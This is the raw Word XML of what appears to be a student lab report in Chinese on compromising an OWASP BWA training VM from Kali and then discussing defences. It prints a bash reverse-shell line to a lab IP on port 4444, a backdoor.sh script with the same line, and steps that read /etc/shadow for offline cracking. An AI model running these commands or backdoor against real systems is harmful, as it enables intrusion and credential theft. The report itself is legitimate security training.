          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>/192.168.56.111/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BB65C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結果： Kali 成功接收反向連線並取得 root 權限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183D18AE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三、目標系統偵察與權限驗證</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ad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153"/>
        <w:gridCol w:w="4271"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91422" w14:paraId="66EEC20D" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AE88F5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指令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2153" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46CF1AE6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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="4271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1247C8CB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執行結果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="4DB2D6D9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7097504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uname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-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2153" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77F0832B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查看核心與系統資訊</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60E509B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Linux </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>owaspbwa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2.6.32-25-generic-pae</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="41B60E97" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60E9181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whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2153" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="694E6C0B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檢查當前使用者</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0093D09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root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="2441BEDE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="005A999E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id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2153" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EC3EA6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查詢 UID 與群組</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D0497D6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uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>=0(root) gid=0(root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="1B56BA57" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09440120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ls /home</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2153" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10EBDE2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檢查家目錄使用者</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43B53FA0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發現使用者 user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="0262EAF6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69374D9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cat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/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2153" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09A82CE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取得系統帳號列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13CEDF8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可讀取</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="1A9A1AF7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27DC7E77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cat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/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2153" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50EC5D52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密碼雜湊資料</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4271" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16C4E537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成功讀取，可用於破解分析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2509411C" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F139EAB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四、網站目錄與弱點分析</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="ae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14"/>
        <w:gridCol w:w="1396"/>
        <w:gridCol w:w="3686"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91422" w14:paraId="0F8D663B" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3214" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EBAFB9B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指令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4653625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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07EFA4AE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結果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="5CF9B736" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3214" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E978FB2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ls -l /var/www/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5770643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列出網站根目錄</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DC1C04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包含 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>bwapp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>webgoat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>wivet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等漏洞平台</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="798A69EB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3214" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72F6698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ls /var/www/html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="723B7B37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檢查常用目錄</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EF2F41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不存在</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="1C55AA60" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3214" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E0E67A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cat </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>/var/www/html/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>index.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19ABB20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嘗試讀取首</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>頁</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AD8DAF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無資料可讀（目錄不存在）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D75DA9A" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D50027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五、網路服務與可橫向移動資源偵測</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C4643" w14:textId="77777777" w:rsidR="00C91422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查看開啟的網路服務：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A02B70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netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>tulnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06AF6340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偵測結果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117F2F85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80：Apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574ECDAB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443：HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0534F67C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22：SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE0B2F6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3306：MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563E5EE2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5432：PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CAE3F0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其他服務：Java、Samba、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>nmbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F972DE0" w14:textId="77777777" w:rsidR="00C91422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查詢</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>本地網段資訊</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>（ARP）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C7D359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arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E03E988" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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偵測到：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4722C4F9" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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192.168.56.111（Kali）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEB51A3" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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192.168.56.1（預設閘道）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA79124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六、已完成成果與潛在攻擊向量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1077CB07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已成功事項：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB480D1" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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成功建立反向 shell 並以 root 權限登入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBEB162" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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取得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 密碼雜湊，可進行離線暴力破解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A7E62D" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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掌握完整系統版本、使用者、家目錄與服務狀況。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F362390" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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探測開放的服務與網路連線資訊。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFF35A4" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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可執行及修改檔案，如部署 backdoor.sh。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB97E76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補充：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16356350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</w:rPr>
        <w:t>1.後門腳本 (backdoor.sh)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192FC404" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
      <w:p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#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587F79A9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bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>/192.168.56.111/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6B28AE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</w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
        </w:rPr>
        <w:t>提權方式</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03045E5A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不需額外</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>提權 ——</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> 目標機預設為 root 使用者執行 Web Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A44C94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從畫面中我們觀察到以下幾點：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1AB837" w14:textId="77777777" w:rsidR="00C91422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在目標機 OWASP BWA 中執行 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> +x、./backdoor.sh 的使用者為：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F19D66C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root@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>owaspbwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D43A8CD" w14:textId="77777777" w:rsidR="00C91422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執行 ./backdoor.sh 成功後連線回 Kali：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AFA9D2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connect to [192.168.56.111] from (UNKNOWN) [192.168.56.105] 47340</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0912C61E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root@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>owaspbwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304724CC" w14:textId="77777777" w:rsidR="00C91422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表示「反向 shell 一開始就是 root 權限」。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345B6CEB" w14:textId="77777777" w:rsidR="00C91422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</w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新細明體" w:eastAsia="新細明體" w:hAnsi="新細明體" w:cs="新細明體"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
        </w:rPr>
        <w:t>本次實驗防禦面觀點總整理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326E3FC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主題：從滲透到防禦</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>｜</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve">反向 Shell → 後門 → </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>提權</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 偵測與阻擋</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A925970" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B7DFFD7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一、阻斷 Backdoor 傳輸與執行</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af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85"/>
        <w:gridCol w:w="5811"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91422" w14:paraId="1F632F9E" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BCCD95C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防禦措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5811" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CBB7ACF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</w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="16010CF2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2485" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B2680C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Egress Filtering（封鎖對外連線）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5811" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F2693C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限制目標主機向外連線，只允許特定 port（如 80/443），封鎖如 4444 的高</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>危埠口</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
